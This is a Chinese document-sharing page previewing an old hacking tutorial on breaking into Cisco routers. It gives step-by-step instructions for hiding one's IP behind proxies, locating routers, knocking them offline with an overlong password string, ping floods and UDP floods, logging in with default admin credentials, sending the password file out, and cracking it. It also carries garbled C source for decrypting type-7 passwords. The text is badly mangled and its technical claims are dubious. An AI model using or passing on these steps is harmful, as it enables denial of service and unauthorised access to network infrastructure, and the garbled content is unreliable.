拿下CISCO路由器的详细步骤.doc_第1页
拿下CISCO路由器的详细步骤.doc_第2页
拿下CISCO路由器的详细步骤.doc_第3页
拿下CISCO路由器的详细步骤.doc_第4页
拿下CISCO路由器的详细步骤.doc_第5页
已阅读5页,还剩6页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

拿下CISCO路由器的详细步骤不要用这破坏cisco系统,或非法访问系统。这篇文章只是以学习为目的。只可以用在合法行为,不能破坏 任何系统。这篇文章将一步一步的向你展示如何利用发现的缺陷来获得非法访问。如果你攻入了一个cisco 路由器,或者扰乱了系统,将会中断数百个网络客户机,造成大量损失。所以,只可以在被允许的情况下 进行,否则你将会有许多麻烦! - 目录: - 在你看之前需要了解的: 什么是IP地址? 什么是ISP? 什么是TCP/IP数据包? 怎样隐藏你的IP地址? 怎样使用Telnet? 怎样使用HyperTerminal? 怎样使用Ping? 怎样使用TraceRoute? 怎样使用代理服务器? - 第一段:为什么攻击cisco路由器? 第二段:怎样找到一个cisco路由器? 第三段:怎样闯入一个cisco路由器? 第四段:怎样破解密码? 第五段:怎样使用一个cisco路由器? - 你看之前需要了解的知识: - 什么是IP地址? IP是InternetProtocol的缩写,电脑通过IP地址来识别网络中的其它电脑,与其连接。这就是你为什么会 在IRC中被踢走,并且找到你的ISP和你的大概位置。IP地址是很容易得到的,基本上可以由以下几种方法 获得: -你访问某网站,你的IP被记录 -在IRC中,某人得到你的IP地址 -在ICQ,OICQ中,可以简单的得到你的IP地址,使用一些小工具。 -如果你的电脑和某人连接起来,运行systat即可看到和那些电脑连接(以IP地址显示) -某人发给你一封用java程序写的邮件,可以得到你的IP地址 还有其它许多方法得到IP地址,包括使用一些木马和后门程序。 - 什么是ISP? ISP是InternetServiceProvider的缩写,你通过它们连接到internet.你拨号后就会连接和其连接。我 们可以运行一个traceroute(跟踪路径)来寻找我们的ISP(traceroute在后面还会介绍). 你应该看到像这样: tracert222.222.22.22 Tracingrouteto221.223.24.54 overamaximumof30hops. 1147ms122ms132msyour.isp222.222.22.21你的ISP 2122ms143ms123msisp.firewall222.222.22.20程序附件通讯中,没有的话,你可以通过控制面板中安装。首先,你要选择连接协议,我 们选TCP/IPWinsock,接着输入要连接的电脑,下面选择端口。可以选择CallWaitforCall,来等待 文件。这样其它的电脑就可以通过某个端口连接上你了,你也可以聊天,或者传送文件了。 :我的超级终端可能不一样,没有这个功能。 - 怎样使用Ping? Ping的使用很简单,在MS-DOS方式下,输入“pingIP地址”,默认是ping三次,你也可以自己设定。 pingip地址-t 可以使其不停的ping。 改变ping的大小可以这样做: ping-l(size)ip.address ping其实是向远程的机器发送数据包,远程的机器接收到就会把数据包原路返回,我们可以看到这个过程的 时间。时间越短,速度就越快,当然,拥挤的时候,就会发生数据包丢失。Ping会减慢被ping的电脑的速 度,流量过大的时候,甚至使其down机。一分钟的ping攻击就可以使一台win98的电脑崩溃。(因为它的连接 缓冲区溢出-连接过量,所以Windows决定休息休息了:).ping攻击也会占用你许多带宽,所以你的带宽要 比目标机器大(除非目标机器运行的是Windows98,而且你有个不错的猫,那么一分钟内,你就可以叫它下台). Ping攻击对强壮的系统没有效果。 注意:DOSs-t选项不是一个ping攻击,它只是很小的连接一下,而且中间有很多间隔。在Unix或Linux 的机器中,你可以用上参数f进行真正的ping攻击。其实,如果你的分布是POSIX-compliant(POSIX- PortableOperatingSystemInterfacebasedonuniX),否则那就不是真正的Unix/Linux分布。那 么如果你有个OS,称自己既是Unix,又是Linux,那么就是有f。 - 怎样使用TraceRoute? 要跟踪你的连接(可以观察到目标机器的连接路线),只要在MS-DOS方式下,输入“tracertIP地址”。你 将会看到一个电脑的目录,就是你和目标之间通过的机器。. 你可以用此方法确定是否存在防火墙,也可以确定某人的ISP(internetserviceprovider)。 要确定ISP,只要看目标机器的前一个IP地址,那就应该是ISP的路由器。 基本上说,这就是traceroute怎样工作一个TCP/IP数据包,在它的头部有一个值(在IP的头部。如果你不 知道这是什么意思,没关系,你接着往下看就可以了)称作TTL,它是TimeToLive的缩写。当一个数据包通过 路由器的时候,它的TTL值就会减少。这样可能会使数据包在网络中流窜,消耗带宽。所以每当一个数据包TTL 值达到0的时候,它就会失效并且因为一个ICMP错误返回到发送者。现在traceroute先发送一个TTL值为1的 数据包,那么它很快就会返回。查看ICMP错误的头部,traceroute就可以知道数据包第一步通过哪。接着就 会发送TTL值为2的数据包,返回后,就是第二次通过的地方。依次下去,直到最终的目的地,就可以知道整个 路径。 现在你是不是明白了呢?:-) - 怎样使用代理服务器? 在网上寻找一个代理服务器,包括你需要的打开的端口的代理服务器。找到后,你可以用telnet或 hyperterminal通过代理服务器连接到另外一台电脑上。这样做对方的电脑就不可以确定你的IP地址。 - 第一段:为什么攻击cisco路由器? 你可能会想.为什么要攻击cisco路由器呢? 答案就是那样做将对闯入其它的系统非常有用. Cisco路由器非常的快,在一个系统中,一些会是以18T1连接。而且它们非常灵活,尽管大多数运行 telnet,但是它们可以在DoS攻击或攻入其它系统时发挥作用。 它们同时还会有成千的数据包通过。但是可以被捕获进行译码.许多的cisco路由器受托于系统,它们 可以让你获得其网络中访问其它电脑的确切的数量。 - 第二段:怎样找到一个cisco路由器? 寻找一个cisco路由器可以说是以项简单的任务,几乎所有的ISP至少通过一个cisco路由器。最简单的 方法是在dos下运行tracert,你可以跟踪到电脑之间的许多电脑,在这之间,必有一个“cisco”这个 名字。如果你发现了,记下它的IP地址。 :在中国未必有cisco这个名字,但是肯定有路由器的,你可以用SuperScan扫描前两个IP地址, 看哪个开2001端口(Cisco路由器管理)和23端口即是的啦! 现在,你有cisco路由器的位置了,但是它可能还有一个防火墙保护它,所以你要检查一下它是否被封 锁ping连接的次数,如果有回应,它就有可能未被封锁。另外一种方法就是试着访问cisco路由器的一些 端口。你用telnet即可,端口23,如果它要输入密码,未叫输入用 户名,你就可能在一个防火墙。 试着找一个未受防火墙保护的路由器,因为这篇教程主题是路由器,不是教你怎样通过防火墙。当你确 信找到一个好的系统,你应该找一个可以使用23端口的代理服务器,这样你的IP地址就不会被路由器记 录下来了。:找到一台运行Wingate的机器即可。 - 第三段:怎样闯入一个cisco路由器? Cisco路由器运行V4.1版本的软件(现在普遍使用的),这很容易干掉。你只要通过代理服务器连接到 一个cisco路由器,输入一串很长的密码,如: 10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk 10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk 10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk 10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk 现在开始等,cisco系统将会重新启动,可以说你已经攻击它,使它离线了.但是过2-10分钟,它就会 恢复,我们应该进入它。 如果什么都没发生,那么它运行的不是脆弱的软件,你可以多试几种DoS攻击,比如大量的ping.到dos下, 输入ping-l56550cisco.router.ip-t,这会起到同样的效果. :很有可能以上两种方法都不行,反正是要其down机,那么试试那个攻击yahoo的udpFlood,一定可以使其down机。一定要注意小心啊!我相信你应该知道该怎么保护自己。 如果它被动结,就另找一个代理服务器进行连接。并且用户名为admin,密码为admin,因为这是默认的。 因为当它暂时的disabled,它将恢复到默认状态。 :你到我主页,会有一篇文章包括几乎所有的路由器的默认用户名和密码 现在,你已经进入了,你应该获得密码文件!系统运行不同的软件,但大部分有个像htl-textil 这类的提示,现在输入?,观看命。你会看到有很多的命令,你会发现一个传送命令,用这个命令,在当前 Admin用户的情况下,把密码文件发送到你的电脑23端口上。但是在这之前,你要把你的超级终端设定好。你发 送文件之后,超级终端将问你是否接收文件,你选择是并保存在电脑中即可。 你通过了最难的部分,下面准备开始破解密码。 - 第四段:怎样破解密码? 现在,你获得了密码文件,你要破解它才能继续进入路由器。所以你可以运行JohntheRipper之类的软件破 译它。 这是我推荐的最简单的方法.另一种方法是试着把它解码。这样做需要一个解码软件,使用某些解码软件,你还 要有足够的耐心。 这儿有一个专门为cisco路由器密码文件解码的软件,你可以在Linux中编译它: #include #include charxlat= 0x64,0x73,0x66,0x64,0x3b,0x6b,0x66,0x6f, 0x41,0x2c,0x2e,0x69,0x79,0x65,0x77,0x72, 0x6b,0x6c,0x64,0x4a,0x4b,0x44 ; charpw_str1=password7; charpw_str2=enable-password7; char*pname; cdecrypt(enc_pw,dec_pw) char*enc_pw; char*dec_pw; unsignedintseed,i,val=0; if(strlen(enc_pw)&1) return(-1); seed=(enc_pw0-Ɔ)*10+enc_pw1-Ɔ if(seed15|!isdigit(enc_pw0)|!isdigit(enc_pw1) return(-1); for(i=2;i=A&enc_pwi1) if(argc3) usage(); exit(1); if(argv10=-) switch(argv11) caseh: usage(); break; casep: if(cdecrypt(argv2,passwd) fprintf(stderr,Error.n); exit(1); fprintf(stdout,password:%sn,passwd); break; default: fprintf(stderr,%s:unknowoption.,pname); return(0); if(in=fopen(argv1,rt)=NULL) exit(1); if(argc2) if(out=fopen(argv2,wt)=NULL) exit(1); while(1) for(i=0;i256;i+) if(linei=fgetc(in)=EOF) if(i) break; fclose(in); fclose(out); return(0); if(linei=r) i-; if(linei=n) break; pw_pos=0; linei=0; if(!strncmp(line,pw_str1,strlen(pw_str1) pw_pos=strlen(pw_str1); if(!strncmp(line,pw_str2,strlen(pw_str2) pw_pos=strlen(pw_str2); if(!pw_pos) fprintf(stdout,%

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论